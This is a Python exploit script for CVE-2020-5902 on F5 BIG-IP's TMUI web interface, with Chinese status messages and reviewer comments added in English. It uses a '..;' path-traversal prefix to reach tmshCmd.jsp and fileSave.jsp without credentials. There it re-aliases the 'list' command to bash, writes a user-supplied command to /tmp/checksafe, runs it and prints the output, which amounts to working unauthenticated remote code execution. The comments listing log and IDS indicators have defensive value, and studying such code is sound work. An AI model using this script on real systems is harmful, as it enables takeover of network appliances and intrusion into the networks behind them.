import requests   #by 斯文
import sys
import json
# Silences urllib3 warnings for the whole process. check() below sends every
# request with verify=False, so without this call each HTTPS request would emit
# an InsecureRequestWarning; with it, the skipped certificate validation is no
# longer visible in the output.
requests.packages.urllib3.disable_warnings()

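# Start-up banner (ASCII art spelling the CVE id, plus the author credit).
# Written as a raw string: the art contains backslash sequences such as "\ "
# and "\_" that are not valid escapes and trigger an invalid-escape warning
# in a normal string literal. The resulting text is unchanged.
banner = r'''
   ______     _______     ____   ___ ____   ___       ____  ___   ___ ____  
  / ___\ \   / / ____|   |___ \ / _ \___ \ / _ \     | ___|/ _ \ / _ \___ \ 
 | |    \ \ / /|  _| _____ __) | | | |__) | | | |____|___ \ (_) | | | |__) |
 | |___  \ V / | |__|_____/ __/| |_| / __/| |_| |_____|__) \__, | |_| / __/ 
  \____|  \_/  |_____|   |_____|\___/_____|\___/     |____/  /_/ \___/_____|                                                 
  
                                                        by 斯文
'''

# Headers attached to every request the script sends. The User-Agent is a
# fixed desktop-browser string (Chrome 83 on macOS); because it mimics a
# common browser it is a weak log indicator on its own and is only useful
# in combination with the request paths.
headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
}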

def check(url: str, cmd: str) -> None:
    """Send a fixed sequence of five GET requests to ``url`` and print the fourth response.

    Every request path begins with ``/tmui/login.jsp/..;/`` and is sent with
    only the module-level ``headers`` (no credentials or session cookie are
    attached). In order, the query strings ask:

    1. ``tmshCmd.jsp`` to delete the private cli alias ``list``;
    2. ``tmshCmd.jsp`` to create a private cli alias ``list`` for ``bash``;
    3. ``fileSave.jsp`` to save ``cmd`` as ``/tmp/checksafe``;
    4. ``tmshCmd.jsp`` to run ``list /tmp/checksafe``;
    5. the same alias deletion as step 1.

    Only the body of request 4 is printed. The other responses are never
    inspected and no status code is checked, so the output does not show
    whether the individual steps succeeded.

    Review notes, taken from the literals in this function:

    * Log and IDS search strings: ``/tmui/login.jsp/..;/`` in the request
      URI, together with ``tmshCmd.jsp`` / ``fileSave.jsp``; on the device,
      the file ``/tmp/checksafe``.
    * The final alias deletion is not in a ``finally`` block. If any earlier
      request raises (timeout, connection error), it is skipped, so a
      ``list`` alias created in step 2 may be left behind on the device.
    * NOTE(review): what the server does with these requests is not visible
      here; presumably patched TMUI releases reject the ``..;`` path segment.
      Confirm against the vendor advisory for CVE-2020-5902.

    Args:
        url: Base URL of the target, without a trailing slash.
        cmd: Text placed in the ``content`` parameter of the fileSave.jsp request.

    Returns:
        None. Results are printed; exceptions inside the sequence are caught.
    """
    try:
        # Message: "starting test of target: {} command: {}".
        print('[+ 开始测试目标: {}  命令: {}'.format(url,cmd))

        # All four URLs share the prefix /tmui/login.jsp/..;/ followed by the
        # real TMUI page; "+" in the query strings stands for a space.
        del_alias = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'
        creat_alias = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'
        write_bash = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/checksafe&content={}'.format(cmd)
        exec_bash = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/checksafe'
        # Message: "restoring the alias setting in case someone else did not change it back".
        print('[+ 正在还原alias设置，防止其他人未修改回来')
        # verify=False on every request: the server certificate is not validated.
        # x, y and z are assigned but never read.
        x = requests.get(del_alias,headers=headers,verify=False,timeout=30)
        # Message: "hijacking the list command to bash".
        print('[+ 正在将list命令劫持为bash')
        y = requests.get(creat_alias,headers=headers,verify=False,timeout=30)
        # Message: "writing the bash file".
        print('[+ 正在写入bash文件')
        z = requests.get(write_bash,headers=headers,verify=False,timeout=30)
        # Message: "executing the command, see the value of the output field".
        print('[+ 正在执行命令,请查看output字段值'+'\n')
        g = requests.get(exec_bash,headers=headers,verify=False,timeout=30)
        # Second alias deletion; reached only if none of the requests above raised.
        requests.get(del_alias,headers=headers,verify=False,timeout=30)
        # Raises UnicodeDecodeError on a non-UTF-8 body, which the bare except below absorbs.
        text = g.content.decode('utf-8')
        print(text.strip('\n'))
    except:
        # Bare except: catches everything, including KeyboardInterrupt, and
        # reports every failure with the same message
        # ("check whether the target is reachable"), hiding which step failed.
        print('[- 请查看目标是否可以正常访问')
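if __name__ == "__main__":
    # Entry point: expects a base URL and a command string on the command line.
    # The arguments are validated explicitly instead of wrapping the whole run
    # in a catch-all handler, so an unrelated failure (for example an encoding
    # error while printing the banner) is no longer reported as a usage error.
    if len(sys.argv) < 3 or not sys.argv[1]:
        print('python3 CVE-2020-5902.py http://x.x.x.x  whoami')
    else:
        url = sys.argv[1]
        cmd = sys.argv[2]
        # Drop one trailing slash; check() appends paths that start with '/'.
        if url.endswith('/'):
            url = url[:-1]
        print(banner)
        check(url=url, cmd=cmd)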
